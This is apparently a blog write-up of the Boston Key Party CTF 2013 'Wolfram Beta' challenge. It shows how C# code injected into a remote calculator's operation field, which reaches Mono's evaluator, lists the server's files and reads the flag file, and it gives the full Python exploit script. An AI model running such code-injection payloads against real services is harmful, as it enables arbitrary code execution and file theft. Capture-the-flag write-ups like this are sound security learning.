Monday, June 10, 2013

Boston Key Party CTF 2013 - Wolfram Beta writeup

We have a simple remote calculator on 54.218.12.97:34567, that listens number1, operation and number2.
Trying to send some values and symbols to check it.
If number1 and number2 values are not numbers, then calculator sends a message: Hey, numbers only. This is just a calculator.
But operation value may consist of any symbols. My try to inject "+123+"  in operation value was successfull.
Then I've understand, that calculator is used Mono.CSharp.Evaluator.Evaluate method. Here is the exception message.
Unhandled Exception: System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0   
[ERROR] FATAL UNHANDLED EXCEPTION: 
System.ArgumentException: The expression did not set a result    
at Mono.CSharp.Evaluator.Evaluate (System.String input) [0x00000] in :0     
at wolfram_beta.MainClass.ReplCalculator () [0x00000] in :0     
at wolfram_beta.MainClass.Main (System.String[] args) [0x00000] in :0

Trying to get files in current directory to find a "flag" file, using the next injection in operation value.
op = '==1; foreach (var dir in System.IO.Directory.GetFiles(System.IO.Directory.GetCurrentDirectory())) System.Console.WriteLine(dir); 31337+'
Awesome! Flag file is found :)
/home/wbeta/flag
Now just need to read it.
Here is full exploit code: 
import time
import socket
 
s = socket.socket()
s.connect(("54.218.12.97", 34567))
 
# receive calculator info
data = s.recv(1024)
print data
data = s.recv(1024)
print data
 
# set numbers and operation
n1 = '0'
n2 = '0'
op = '==1; System.Console.WriteLine(System.IO.File.ReadAllText("/home/wbeta/flag")); 31337+'
 
# send nums and op
s.send(n1 + '\n')
 
data = s.recv(1024)
print data 
s.send(op + '\n')
data = s.recv(1024)
print data 
s.send(n2 + '\n')
data = s.recv(1024)
print data
data = s.recv(1024)
 
# thinking...
while 'Done Thinking!' not in data:
 data = s.recv(1024)
 print data,
 
# receive result
data = s.recv(1024)
print data

Done! Flag is received: at_least_its_not_a_python_jail
It's not a python jail :)
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)